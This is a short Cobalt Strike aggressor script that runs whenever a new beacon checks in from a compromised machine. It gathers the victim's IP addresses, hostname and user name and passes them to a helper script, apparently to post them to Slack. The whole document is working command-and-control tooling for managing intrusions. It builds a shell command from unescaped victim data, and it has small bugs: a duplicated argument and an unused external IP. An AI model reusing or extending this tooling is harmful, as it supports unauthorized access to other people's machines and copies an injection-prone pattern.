# Issue initial commands upon new beacon checkin
# slacknotification.cna

on beacon_initial {
    println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
    local('$internalIP $externalIP $computerName $userName');
    $internalIP = replace(beacon_info($1,"internal")," ","_");
    $externalIP = replace(beacon_info($1,"external")," ","_");
    $computerName = replace(beacon_info($1,"computer")," ","_");
    $userName = replace(beacon_info($1,"user")," ","_");
    $cmd = 'python /home/bob/cobaltstrike/cobaltslack.py --computername ' . $computerName . " --internalip " . $internalIP . " --username " . $userName . " --internalip " . $internalIP;

    println("Sending Slack Notification: " . $cmd);
    exec($cmd);
    }
